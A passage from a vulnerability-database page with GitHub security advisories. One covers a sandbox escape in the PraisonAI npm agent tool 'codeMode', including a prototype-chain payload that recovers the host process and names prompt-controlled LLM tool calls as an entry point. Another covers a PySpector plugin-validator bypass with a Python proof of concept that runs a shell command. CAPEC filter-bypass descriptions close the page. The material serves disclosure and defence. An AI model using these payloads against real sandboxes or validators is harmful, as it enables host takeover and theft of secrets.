The PoV shows those intended restrictions work for naive payloads but fail for a standard JavaScript prototype-chain escape.

PraisonAI's official JavaScript and TypeScript docs describe the npm package as a production-ready agent framework installed with npm install praisonai. Public PraisonAI advisories rate comparable Python sandbox escapes as Critical when user/LLM-supplied code crosses from a claimed sandbox into host execution.

PoV

The PoV installs a published npm package version into a temporary project and runs from a real CommonJS script file. Running from a file is important because normal Node applications expose process.mainModule.require; node -e or stdin do not always reproduce that deployment shape.

Run from a local reproduction checkout:

node poc/pov_poc.js 1.7.1

Observed result:

{
  "package": "praisonai",
  "version": "1.7.1",
  "codeModeExported": true,
  "directRequireFsControl": {
    "stderr": "Blocked pattern detected: require\\s*\\(\\s*['\"]fs['\"]\\s*\\)",
    "exitCode": 1,
    "success": false,
    "error": "Code contains blocked patterns for security"
  },
  "directChildProcessControl": {
    "stderr": "Blocked pattern detected: require\\s*\\(\\s*['\"]child_process['\"]\\s*\\)",
    "exitCode": 1,
    "success": false,
    "error": "Code contains blocked patterns for security"
  },
  "escapedProcessEnv": {
    "output": "poc",
    "exitCode": 0,
    "success": true
  },
  "escapedFilesystem": {
    "output": "fs-ok",
    "exitCode": 0,
    "success": true
  },
  "escapedCommand": {
    "output": "poc",
    "exitCode": 0,
    "success": true
  }
}

Interpretation:

  • direct require('fs') is blocked;
  • direct require('child_process') is blocked;
  • the Function-constructor payload recovers host process;
  • the escaped process reads a host environment variable;
  • the escaped process imports fs; and
  • the escaped process imports child_process and runs a harmless printf.

The PoV does not contact any LLM provider or external service after npm package installation. It does not modify host files or execute a destructive command.

PoC

The PoV section above contains the local reproduction command, input, and decisive output.

Impact

An attacker who can supply code to codeMode can escape the advertised sandbox and execute with the privileges of the Node.js PraisonAI process.

Realistic entry points include:

  • an application that exposes codeMode as an agent tool to end users;
  • an LLM/tool-call flow where prompt-controlled content reaches the code parameter;
  • MCP or tool-registry integrations that make the built-in codeMode tool callable; or
  • any multi-tenant service that relies on codeMode to safely run user or model-generated JavaScript.

Impact after escape includes:

  • reading process environment variables, including API keys and service tokens;
  • reading files available to the Node process;
  • spawning subprocesses with child_process;
  • writing or modifying files through host filesystem APIs; and
  • terminating or resource-exhausting the host process.

Severity

Suggested severity: Critical.

Rationale:

  • AV: codeMode is a designated agent/tool surface and can be reached over the network in standard agent applications that expose tool calls to users or LLM-controlled workflows.
  • AC: a single code payload is enough.
  • PR: the attacker needs the ability to submit code or prompt-controlled content to an agent/tool flow.
  • UI: no additional user interaction is required once the tool is invoked.
  • S: execution crosses from the advertised sandbox security scope into the host Node.js process.
  • C: host files and environment variables are readable.
  • I: host subprocess and filesystem APIs are reachable.
  • A: escaped code can terminate processes or consume host resources.

Suggested Fix

Do not use host-process new Function plus source-code blocklists as a sandbox.

Recommended fix direction:

  1. Disable or clearly mark npm codeMode as unsafe until a real isolation boundary exists.
  2. Execute untrusted code in a separate OS process, container, worker isolate, or similar boundary with a restricted user, minimal environment, temporary working directory, no inherited secrets, and explicit IPC for allowed tool calls.
  3. Enforce allowNetwork, allowedPaths, timeoutMs, maxMemoryMb, allowedTools, and blockedTools at that boundary instead of by scanning source strings.
  4. Do not rely on node:vm alone for untrusted code. The Node.js documentation explicitly says the vm module is not a security mechanism.
  5. Add regression tests for:
  6. direct require('fs') and require('child_process') blocked controls;
  7. ({}).constructor.constructor('return process')() blocked;
  8. process.mainModule.require('fs') unavailable;
  9. process.mainModule.require('child_process') unavailable;
  10. host environment variables unavailable unless explicitly passed; and
  11. tool-call IPC still works for allowed tools.

If maintainers need an emergency mitigation before a real sandbox exists, reject codeMode execution unless the caller opts into "unsafe host JS execution" with clear documentation that it can access the full Node process.

Affected Package/Versions

  • Repository: MervinPraison/PraisonAI
  • Ecosystem: npm
  • Package: praisonai
  • Component: src/praisonai-ts/src/tools/builtins/code-mode.ts
  • Current npm version checked: 1.7.1
  • Refreshed origin/main checked: 1ad58ca02975ff1398efeda694ea2ab78f20cf3e

Confirmed affected range:

>= 1.4.0, <= 1.7.1

Boundary:

1.3.6 does not export codeMode and does not ship dist/tools/builtins/code-mode.js.

No fixed npm version is known at the time of this report.

Version Sweep

The included sweep installs selected npm versions and runs the same vulnerable shape from a script file:

node poc/version_sweep_poc.js

Observed result:

1.3.6: codeModeExported=false, hasDistCodeMode=false
1.4.0: directRequireFsBlocked=true, escapeProcessEnv=true, escapeFilesystem=true, escapeCommand=true
1.5.4: directRequireFsBlocked=true, escapeProcessEnv=true, escapeFilesystem=true, escapeCommand=true
1.6.0: directRequireFsBlocked=true, escapeProcessEnv=true, escapeFilesystem=true, escapeCommand=true
1.7.0: directRequireFsBlocked=true, escapeProcessEnv=true, escapeFilesystem=true, escapeCommand=true
1.7.1: directRequireFsBlocked=true, escapeProcessEnv=true, escapeFilesystem=true, escapeCommand=true

Git history for the TypeScript file points to the 1.4.0 integration:

56f36e25 feat: bump version to 1.4.0 and add AI SDK integration dependencies
2bad9a50 feat: bump version to 1.4.0 and add AI SDK integration dependencies

Advisory History

Checked:

  • visible PraisonAI advisories and prior reports;
  • public GitHub advisory search results for PraisonAI codeMode, npm, sandbox, new Function, process, and child_process; and
  • visible public PraisonAI advisories for sandbox escapes.

Closest related advisories are Python/PyPI scoped and do not cover this npm TypeScript implementation:

  • GHSA-qf73-2hrx-xprp / CVE-2026-39888: pip:praisonaiagents execute_code() frame traversal in a Python subprocess sandbox.
  • GHSA-4mr5-g6f9-cfrh / CVE-2026-47392: pip:praisonai Python execute_code() sandbox escape through print.__self__.
  • Other published PraisonAI sandbox advisories cover Python execute_code, SubprocessSandbox, Sandlock/native fallback, or CLI/managed-agent bridges.

This report is distinct because it targets:

  • ecosystem: npm;
  • package: praisonai;
  • component: src/praisonai-ts/src/tools/builtins/code-mode.ts;
  • root cause: host-context new Function plus blocklist/name-shadowing sandbox; and
  • affected range: >= 1.4.0, <= 1.7.1.

One private npm report has already been submitted for TypeScript AgentOS missing authentication (GHSA-9752-mhqh-h34f). That is also distinct: it covers unauthenticated HTTP agent listing/invocation, not a codeMode sandbox escape.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.7.1"
      },
      "package": {
        "ecosystem": "npm",
        "name": "praisonai"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.4.0"
            },
            {
              "fixed": "1.7.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-184",
      "CWE-693"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-18T14:26:32Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "## Summary\n\nThe published npm package `praisonai` exports a TypeScript built-in tool named `codeMode`. The package describes this tool as executing code in a sandboxed environment, marks its capability as `sandbox: true`, and registers it through the public tools facade.\n\nThe implementation does not create an isolation boundary. It applies a small regular-expression blocklist, sets `process` and `require` to `undefined` inside a plain JavaScript object, and then executes attacker-controlled code with the host process `new Function` constructor:\n\n```text\nconst fn = new Function(\u0027sandbox\u0027, `with (sandbox) { ${code} }`);\nconst result = fn(sandbox);\n```\n\nBecause this runs in the host V8 context, code inside `codeMode` can use the JavaScript prototype chain to recover the real `Function` constructor:\n\n```text\n({}).constructor.constructor(\u0027return process\u0027)()\n```\n\nFrom a normal CommonJS application script, the recovered `process` object exposes `process.mainModule.require`. That bypasses the explicit `require(\u0027fs\u0027)` and `require(\u0027child_process\u0027)` controls and allows host filesystem access and subprocess execution from code that was supposed to be sandboxed.\n\n## Technical Details\n\nCurrent-head source says `codeMode` is a built-in package tool and explicitly advertises a sandbox boundary:\n\n```text\nsrc/praisonai-ts/src/tools/builtins/code-mode.ts\n  13: description: \u0027Execute code that can import and use other tools in a sandboxed environment\u0027,\n  24: capabilities: {\n  25:   sandbox: true,\n  26:   code: true,\n  28: packageName: \u0027praisonai\u0027,\n  85: description: \u0027Execute code in a sandboxed environment with access to imported tools. Write files, run code, and get results.\u0027,\n```\n\nThe same file implements security as a blocklist of exact source-code patterns:\n\n```text\nsrc/praisonai-ts/src/tools/builtins/code-mode.ts\n  108: const blockedPatterns = [\n  109:   /require\\s*\\(\\s*[\u0027\"]child_process[\u0027\"]\\s*\\)/,\n  110:   /require\\s*\\(\\s*[\u0027\"]fs[\u0027\"]\\s*\\)/,\n  111:   /import\\s+.*from\\s+[\u0027\"]child_process[\u0027\"]/,\n  112:   /process\\.exit/,\n  113:   /eval\\s*\\(/,\n```\n\nIt then tries to hide dangerous globals by shadowing names in a normal object:\n\n```text\nsrc/praisonai-ts/src/tools/builtins/code-mode.ts\n  168: process: undefined,\n  169: require: undefined,\n```\n\nFinally, it executes the untrusted code in the host process using `new Function` and `with (sandbox)`:\n\n```text\nsrc/praisonai-ts/src/tools/builtins/code-mode.ts\n  187: const fn = new Function(\n  188:   \u0027sandbox\u0027,\n  189:   `with (sandbox) { ${code} }`\n  190: );\n  191: const result = fn(sandbox);\n```\n\nThis is not a sandbox. `new Function` does not create a separate security context, and variable shadowing does not remove access to constructors reachable through normal JavaScript objects.\n\nThe tool is reachable through the public npm SDK:\n\n```text\nsrc/praisonai-ts/src/index.ts\n  117: airweaveSearch, codeMode,\n\nsrc/praisonai-ts/src/tools/tools.ts\n  104: // Code Mode\n  105: registry.register(CODE_MODE_METADATA, createCodeModeTool as ToolFactory);\n  167: // Code Mode\n  168: codeMode: (config?: CodeModeConfig) =\u003e codeMode(config),\n```\n\n### Why This Is Not Intended Behavior\n\nThis is not merely \"the user can execute code because codeMode executes code.\" The vulnerability is that code which is explicitly described and exposed as sandboxed can escape the intended restrictions.\n\nThe implementation itself proves an intended security boundary exists:\n\n- `CODE_MODE_METADATA.capabilities.sandbox` is `true`;\n- the tool description says it executes in a sandboxed environment;\n- direct access to `fs` and `child_process` is explicitly blocked;\n- `process` and `require` are explicitly shadowed as `undefined`;\n- `allowNetwork` defaults to `false`; and\n- the config includes security-relevant controls such as `blockedTools`, `allowedPaths`, `timeoutMs`, and `maxMemoryMb`.\n\nThe PoV shows those intended restrictions work for naive payloads but fail for a standard JavaScript prototype-chain escape.\n\nPraisonAI\u0027s official JavaScript and TypeScript docs describe the npm package as a production-ready agent framework installed with `npm install praisonai`. Public PraisonAI advisories rate comparable Python sandbox escapes as Critical when user/LLM-supplied code crosses from a claimed sandbox into host execution.\n\n## PoV\n\nThe PoV installs a published npm package version into a temporary project and runs from a real CommonJS script file. Running from a file is important because normal Node applications expose `process.mainModule.require`; `node -e` or stdin do not always reproduce that deployment shape.\n\nRun from a local reproduction checkout:\n\n```fish\nnode poc/pov_poc.js 1.7.1\n```\n\nObserved result:\n\n```json\n{\n  \"package\": \"praisonai\",\n  \"version\": \"1.7.1\",\n  \"codeModeExported\": true,\n  \"directRequireFsControl\": {\n    \"stderr\": \"Blocked pattern detected: require\\\\s*\\\\(\\\\s*[\u0027\\\"]fs[\u0027\\\"]\\\\s*\\\\)\",\n    \"exitCode\": 1,\n    \"success\": false,\n    \"error\": \"Code contains blocked patterns for security\"\n  },\n  \"directChildProcessControl\": {\n    \"stderr\": \"Blocked pattern detected: require\\\\s*\\\\(\\\\s*[\u0027\\\"]child_process[\u0027\\\"]\\\\s*\\\\)\",\n    \"exitCode\": 1,\n    \"success\": false,\n    \"error\": \"Code contains blocked patterns for security\"\n  },\n  \"escapedProcessEnv\": {\n    \"output\": \"poc\",\n    \"exitCode\": 0,\n    \"success\": true\n  },\n  \"escapedFilesystem\": {\n    \"output\": \"fs-ok\",\n    \"exitCode\": 0,\n    \"success\": true\n  },\n  \"escapedCommand\": {\n    \"output\": \"poc\",\n    \"exitCode\": 0,\n    \"success\": true\n  }\n}\n```\n\nInterpretation:\n\n- direct `require(\u0027fs\u0027)` is blocked;\n- direct `require(\u0027child_process\u0027)` is blocked;\n- the Function-constructor payload recovers host `process`;\n- the escaped process reads a host environment variable;\n- the escaped process imports `fs`; and\n- the escaped process imports `child_process` and runs a harmless `printf`.\n\nThe PoV does not contact any LLM provider or external service after npm package installation. It does not modify host files or execute a destructive command.\n\n## PoC\n\nThe PoV section above contains the local reproduction command, input, and decisive output.\n\n## Impact\n\nAn attacker who can supply code to `codeMode` can escape the advertised sandbox and execute with the privileges of the Node.js PraisonAI process.\n\nRealistic entry points include:\n\n- an application that exposes `codeMode` as an agent tool to end users;\n- an LLM/tool-call flow where prompt-controlled content reaches the `code` parameter;\n- MCP or tool-registry integrations that make the built-in `codeMode` tool callable; or\n- any multi-tenant service that relies on `codeMode` to safely run user or model-generated JavaScript.\n\nImpact after escape includes:\n\n- reading process environment variables, including API keys and service tokens;\n- reading files available to the Node process;\n- spawning subprocesses with `child_process`;\n- writing or modifying files through host filesystem APIs; and\n- terminating or resource-exhausting the host process.\n\n### Severity\n\nSuggested severity: Critical.\n\nRationale:\n\n- `AV`: `codeMode` is a designated agent/tool surface and can be reached over the network in standard agent applications that expose tool calls to users or LLM-controlled workflows.\n- `AC`: a single code payload is enough.\n- `PR`: the attacker needs the ability to submit code or prompt-controlled content to an agent/tool flow.\n- `UI`: no additional user interaction is required once the tool is invoked.\n- `S`: execution crosses from the advertised sandbox security scope into the host Node.js process.\n- `C`: host files and environment variables are readable.\n- `I`: host subprocess and filesystem APIs are reachable.\n- `A`: escaped code can terminate processes or consume host resources.\n\n## Suggested Fix\n\nDo not use host-process `new Function` plus source-code blocklists as a sandbox.\n\nRecommended fix direction:\n\n1. Disable or clearly mark npm `codeMode` as unsafe until a real isolation boundary exists.\n2. Execute untrusted code in a separate OS process, container, worker isolate, or similar boundary with a restricted user, minimal environment, temporary working directory, no inherited secrets, and explicit IPC for allowed tool calls.\n3. Enforce `allowNetwork`, `allowedPaths`, `timeoutMs`, `maxMemoryMb`, `allowedTools`, and `blockedTools` at that boundary instead of by scanning source strings.\n4. Do not rely on `node:vm` alone for untrusted code. The Node.js documentation explicitly says the `vm` module is not a security mechanism.\n5. Add regression tests for:\n   - direct `require(\u0027fs\u0027)` and `require(\u0027child_process\u0027)` blocked controls;\n   - `({}).constructor.constructor(\u0027return process\u0027)()` blocked;\n   - `process.mainModule.require(\u0027fs\u0027)` unavailable;\n   - `process.mainModule.require(\u0027child_process\u0027)` unavailable;\n   - host environment variables unavailable unless explicitly passed; and\n   - tool-call IPC still works for allowed tools.\n\nIf maintainers need an emergency mitigation before a real sandbox exists, reject `codeMode` execution unless the caller opts into \"unsafe host JS execution\" with clear documentation that it can access the full Node process.\n\n## Affected Package/Versions\n\n- Repository: `MervinPraison/PraisonAI`\n- Ecosystem: `npm`\n- Package: `praisonai`\n- Component: `src/praisonai-ts/src/tools/builtins/code-mode.ts`\n- Current npm version checked: `1.7.1`\n- Refreshed `origin/main` checked: `1ad58ca02975ff1398efeda694ea2ab78f20cf3e`\n\nConfirmed affected range:\n\n```text\n\u003e= 1.4.0, \u003c= 1.7.1\n```\n\nBoundary:\n\n```text\n1.3.6 does not export codeMode and does not ship dist/tools/builtins/code-mode.js.\n```\n\nNo fixed npm version is known at the time of this report.\n\n### Version Sweep\n\nThe included sweep installs selected npm versions and runs the same vulnerable shape from a script file:\n\n```fish\nnode poc/version_sweep_poc.js\n```\n\nObserved result:\n\n```text\n1.3.6: codeModeExported=false, hasDistCodeMode=false\n1.4.0: directRequireFsBlocked=true, escapeProcessEnv=true, escapeFilesystem=true, escapeCommand=true\n1.5.4: directRequireFsBlocked=true, escapeProcessEnv=true, escapeFilesystem=true, escapeCommand=true\n1.6.0: directRequireFsBlocked=true, escapeProcessEnv=true, escapeFilesystem=true, escapeCommand=true\n1.7.0: directRequireFsBlocked=true, escapeProcessEnv=true, escapeFilesystem=true, escapeCommand=true\n1.7.1: directRequireFsBlocked=true, escapeProcessEnv=true, escapeFilesystem=true, escapeCommand=true\n```\n\nGit history for the TypeScript file points to the 1.4.0 integration:\n\n```text\n56f36e25 feat: bump version to 1.4.0 and add AI SDK integration dependencies\n2bad9a50 feat: bump version to 1.4.0 and add AI SDK integration dependencies\n```\n\n## Advisory History\n\nChecked:\n\n- visible PraisonAI advisories and prior reports;\n- public GitHub advisory search results for PraisonAI `codeMode`, npm, sandbox, `new Function`, `process`, and `child_process`; and\n- visible public PraisonAI advisories for sandbox escapes.\n\nClosest related advisories are Python/PyPI scoped and do not cover this npm TypeScript implementation:\n\n- `GHSA-qf73-2hrx-xprp` / `CVE-2026-39888`: `pip:praisonaiagents` `execute_code()` frame traversal in a Python subprocess sandbox.\n- `GHSA-4mr5-g6f9-cfrh` / `CVE-2026-47392`: `pip:praisonai` Python `execute_code()` sandbox escape through `print.__self__`.\n- Other published PraisonAI sandbox advisories cover Python `execute_code`, `SubprocessSandbox`, Sandlock/native fallback, or CLI/managed-agent bridges.\n\nThis report is distinct because it targets:\n\n- ecosystem: `npm`;\n- package: `praisonai`;\n- component: `src/praisonai-ts/src/tools/builtins/code-mode.ts`;\n- root cause: host-context `new Function` plus blocklist/name-shadowing sandbox; and\n- affected range: `\u003e= 1.4.0, \u003c= 1.7.1`.\n\nOne private npm report has already been submitted for TypeScript `AgentOS` missing authentication (`GHSA-9752-mhqh-h34f`). That is also distinct: it covers unauthenticated HTTP agent listing/invocation, not a `codeMode` sandbox escape.",
  "id": "GHSA-vmmj-pfw7-fjwp",
  "modified": "2026-06-18T14:26:32Z",
  "published": "2026-06-18T14:26:32Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-vmmj-pfw7-fjwp"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/MervinPraison/PraisonAI"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "npm PraisonAI codeMode sandbox escape via Function constructor"
}

GHSA-VP22-38M5-R39R

Vulnerability from github – Published: 2026-04-16 01:09 – Updated: 2026-04-24 20:53
VLAI
Summary
PySpector has a Plugin Code Execution Bypass via Incomplete Static Analysis in PluginSecurity.validate_plugin_code
Details

Summary

The plugin security validator in PySpector uses AST-based static analysis to prevent dangerous code from being loaded as plugins. The blocklist implemented in PluginSecurity.validate_plugin_code is incomplete and can be bypassed using several Python constructs that are not checked. An attacker who can supply a plugin file can achieve arbitrary code execution within the PySpector process when that plugin is installed and executed.

Details

The validator maintains a set called fatal_calls that enumerates explicitly forbidden function names and attribute access patterns such as eval, exec, os.system, and subprocess.Popen. However, this approach relies on an exhaustive blocklist of known-dangerous identifiers, which is inherently incomplete.

The following bypass techniques are not detected by the current implementation:

importlib.import_module is not in fatal_calls and is not treated as a dangerous module, so it can be used to load os, subprocess, or any other module at runtime without triggering the validator.

Dynamic attribute chains using __class__.__mro__ and related dunder attributes allow traversal of the class hierarchy to reach arbitrary built-in functions without naming them directly in the source.

ctypes is not blocked and can be used to call native library functions including system.

__builtins__ dictionary access exposes all built-in callables without using the names that the validator checks.

types.CodeType allows construction and execution of raw code objects.

The alias resolution in the AST visitor only handles simple import X as Y cases, so aliased imports of blocked modules evade detection, and transitive imports through unblocked modules are never examined.

Because the validator produces a pass/fail result that gates plugin installation with the --trust flag, a bypass causes untrusted plugin code to execute with the full privileges of the PySpector process.

PoC

import textwrap, tempfile, os

evil_plugin = textwrap.dedent("""
import importlib
mod = importlib.import_module('os')
mod.system('id > /tmp/pwned')
""")

with tempfile.NamedTemporaryFile(suffix=".py", mode="w", delete=False) as f:
    f.write(evil_plugin)
    plugin_path = f.name

from pyspector.plugin_system import PluginSecurity

result = PluginSecurity.validate_plugin_code(plugin_path)
print("Validation passed:", result)

exec(compile(open(plugin_path).read(), plugin_path, "exec"))

print("Command output:", open("/tmp/pwned").read())
os.unlink(plugin_path)

Impact

Any user or process that can supply a plugin file to PySpector and invoke the plugin installation workflow can execute arbitrary operating system commands with the privileges of the PySpector process. The static analysis check provides a false sense of security, as it can be circumvented trivially using standard library modules that are present in every Python installation. All versions of PySpector that include the plugin system are affected.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.1.7"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "pyspector"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.1.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-41206"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-184"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-16T01:09:17Z",
    "nvd_published_at": "2026-04-23T02:16:18Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nThe plugin security validator in PySpector uses AST-based static analysis to prevent dangerous code from being loaded as plugins. The blocklist implemented in `PluginSecurity.validate_plugin_code` is incomplete and can be bypassed using several Python constructs that are not checked. An attacker who can supply a plugin file can achieve arbitrary code execution within the PySpector process when that plugin is installed and executed.\n\n### Details\n\nThe validator maintains a set called `fatal_calls` that enumerates explicitly forbidden function names and attribute access patterns such as eval, exec, `os.system`, and `subprocess.Popen`. However, this approach relies on an exhaustive blocklist of known-dangerous identifiers, which is inherently incomplete.\n\nThe following bypass techniques are not detected by the current implementation:\n\n`importlib.import_module` is not in `fatal_calls` and is not treated as a dangerous module, so it can be used to load os, subprocess, or any other module at runtime without triggering the validator.\n\nDynamic attribute chains using `__class__.__mro__` and related dunder attributes allow traversal of the class hierarchy to reach arbitrary built-in functions without naming them directly in the source.\n\nctypes is not blocked and can be used to call native library functions including system.\n\n`__builtins__` dictionary access exposes all built-in callables without using the names that the validator checks.\n\n`types.CodeType` allows construction and execution of raw code objects.\n\nThe alias resolution in the AST visitor only handles simple import X as Y cases, so aliased imports of blocked modules evade detection, and transitive imports through unblocked modules are never examined.\n\nBecause the validator produces a pass/fail result that gates plugin installation with the --trust flag, a bypass causes untrusted plugin code to execute with the full privileges of the PySpector process.\n\n### PoC\n\n```python\nimport textwrap, tempfile, os\n\nevil_plugin = textwrap.dedent(\"\"\"\nimport importlib\nmod = importlib.import_module(\u0027os\u0027)\nmod.system(\u0027id \u003e /tmp/pwned\u0027)\n\"\"\")\n\nwith tempfile.NamedTemporaryFile(suffix=\".py\", mode=\"w\", delete=False) as f:\n    f.write(evil_plugin)\n    plugin_path = f.name\n\nfrom pyspector.plugin_system import PluginSecurity\n\nresult = PluginSecurity.validate_plugin_code(plugin_path)\nprint(\"Validation passed:\", result)\n\nexec(compile(open(plugin_path).read(), plugin_path, \"exec\"))\n\nprint(\"Command output:\", open(\"/tmp/pwned\").read())\nos.unlink(plugin_path)\n```\n\n### Impact\n\nAny user or process that can supply a plugin file to PySpector and invoke the plugin installation workflow can execute arbitrary operating system commands with the privileges of the PySpector process. The static analysis check provides a false sense of security, as it can be circumvented trivially using standard library modules that are present in every Python installation. All versions of PySpector that include the plugin system are affected.",
  "id": "GHSA-vp22-38m5-r39r",
  "modified": "2026-04-24T20:53:36Z",
  "published": "2026-04-16T01:09:17Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/ParzivalHack/PySpector/security/advisories/GHSA-vp22-38m5-r39r"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41206"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ParzivalHack/PySpector/commit/3c9547157fc07396f22b26b3484a9a91eba98555"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ParzivalHack/PySpector/commit/4e279e078c53d760fd321ff9b698d683c65ccb8e"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/ParzivalHack/PySpector"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:A/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "PySpector has a Plugin Code Execution Bypass via Incomplete Static Analysis in PluginSecurity.validate_plugin_code"
}

Mitigation
Implementation

Strategy: Input Validation

Do not rely exclusively on detecting disallowed inputs. There are too many variants to encode a character, especially when different environments are used, so there is a high likelihood of missing some variants. Only use detection of disallowed inputs as a mechanism for detecting suspicious activity. Ensure that you are using other protection mechanisms that only identify "good" input - such as lists of allowed inputs - and ensure that you are properly encoding your outputs.

CAPEC-120: Double Encoding

The adversary utilizes a repeating of the encoding process for a set of characters (that is, character encoding a character encoding of a character) to obfuscate the payload of a particular request. This may allow the adversary to bypass filters that attempt to detect illegal characters or strings, such as those that might be used in traversal or injection attacks. Filters may be able to catch illegal encoded strings, but may not catch doubly encoded strings. For example, a dot (.), often used in path traversal attacks and therefore often blocked by filters, could be URL encoded as %2E. However, many filters recognize this encoding and would still block the request. In a double encoding, the % in the above URL encoding would be encoded again as %25, resulting in %252E which some filters might not catch, but which could still be interpreted as a dot (.) by interpreters on the target.

CAPEC-15: Command Delimiters

An attack of this type exploits a programs' vulnerabilities that allows an attacker's commands to be concatenated onto a legitimate command with the intent of targeting other resources such as the file system or database. The system that uses a filter or denylist input validation, as opposed to allowlist validation is vulnerable to an attacker who predicts delimiters (or combinations of delimiters) not present in the filter or denylist. As with other injection attacks, the attacker uses the command delimiter payload as an entry point to tunnel through the application and activate additional attacks through SQL queries, shell commands, network scanning, and so on.

CAPEC-182: Flash Injection

An attacker tricks a victim to execute malicious flash content that executes commands or makes flash calls specified by the attacker. One example of this attack is cross-site flashing, an attacker controlled parameter to a reference call loads from content specified by the attacker.

CAPEC-3: Using Leading 'Ghost' Character Sequences to Bypass Input Filters

Some APIs will strip certain leading characters from a string of parameters. An adversary can intentionally introduce leading "ghost" characters (extra characters that don't affect the validity of the request at the API layer) that enable the input to pass the filters and therefore process the adversary's input. This occurs when the targeted API will accept input data in several syntactic forms and interpret it in the equivalent semantic way, while the filter does not take into account the full spectrum of the syntactic forms acceptable to the targeted API.

CAPEC-43: Exploiting Multiple Input Interpretation Layers

An attacker supplies the target software with input data that contains sequences of special characters designed to bypass input validation logic. This exploit relies on the target making multiples passes over the input data and processing a "layer" of special characters with each pass. In this manner, the attacker can disguise input that would otherwise be rejected as invalid by concealing it with layers of special/escape characters that are stripped off by subsequent processing steps. The goal is to first discover cases where the input validation layer executes before one or more parsing layers. That is, user input may go through the following logic in an application: <parser1> --> <input validator> --> <parser2>. In such cases, the attacker will need to provide input that will pass through the input validator, but after passing through parser2, will be converted into something that the input validator was supposed to stop.

CAPEC-6: Argument Injection

An attacker changes the behavior or state of a targeted application through injecting data or command syntax through the targets use of non-validated and non-filtered arguments of exposed services or methods.

CAPEC-71: Using Unicode Encoding to Bypass Validation Logic

An attacker may provide a Unicode string to a system component that is not Unicode aware and use that to circumvent the filter or cause the classifying mechanism to fail to properly understanding the request. That may allow the attacker to slip malicious data past the content filter and/or possibly cause the application to route the request incorrectly.

CAPEC-73: User-Controlled Filename

An attack of this type involves an adversary inserting malicious characters (such as a XSS redirection) into a filename, directly or indirectly that is then used by the target software to generate HTML text or other potentially executable content. Many websites rely on user-generated content and dynamically build resources like files, filenames, and URL links directly from user supplied data. In this attack pattern, the attacker uploads code that can execute in the client browser and/or redirect the client browser to a site that the attacker owns. All XSS attack payload variants can be used to pass and exploit these vulnerabilities.

CAPEC-85: AJAX Footprinting

This attack utilizes the frequent client-server roundtrips in Ajax conversation to scan a system. While Ajax does not open up new vulnerabilities per se, it does optimize them from an attacker point of view. A common first step for an attacker is to footprint the target environment to understand what attacks will work. Since footprinting relies on enumeration, the conversational pattern of rapid, multiple requests and responses that are typical in Ajax applications enable an attacker to look for many vulnerabilities, well-known ports, network locations and so on. The knowledge gained through Ajax fingerprinting can be used to support other attacks, such as XSS.